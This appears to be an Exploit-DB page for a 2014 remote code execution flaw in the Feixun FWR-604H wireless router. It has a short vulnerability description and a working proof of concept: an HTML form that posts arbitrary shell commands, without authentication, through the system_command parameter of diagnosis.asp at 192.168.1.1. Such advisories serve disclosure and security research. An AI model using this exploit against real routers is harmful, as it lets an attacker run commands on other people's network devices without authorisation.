Feixun Wireless Router FWR-604H - Remote Code Execution

EDB-ID:

30900

CVE:

EDB Verified:

Author:

Arash Abedian

Type:

webapps

Exploit: /

Platform:

Hardware

Date:

2014-01-14

Vulnerable App:

# Exploit Title: [Feixun FWR-604H Wireless Router Remote Code Execution]
# Date: [2014-01-09]
# Exploit Author: [Arash Abedian
(http://www.exploit-db.com/author/?a=6187<http://www.exploit-db.com/author/?a=6187)>
)
# Vendor Homepage: [http://feixun.com.cn]
# Version: [Hardware Version 1.0, Firmware Build: 7642]
# Tested on: [Hardware Version 1.0, Firmware Build: 7642]
# Vulnerability Details:
Feixun FWR-604H 150Mbps Wireless N Router is vulnerable to Remote Code
Execution vulnerability(Hardware Version 1.0, Firmware Build: 7642, Vendor
website:feixun.com.cn). The web server don't authenticate user prior to
system level execution. As such an unauthenticated attacker can easily
remotely exploit the target using system_command parameter in diagnosis.asp
file.

<html>
<body>
Exploit Feixun FWR-604H
<FORM ACTION="http://192.168.1.1/diagnosis.asp" METHOD=POST>
<input type="hidden" name="doType" value="2">
Command: <input type="text" name="system_command">
<input type="hidden" name="diagnosisResult" value="">
<input type="submit" value="Exploit">
</FORM>
</body>
</html>

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services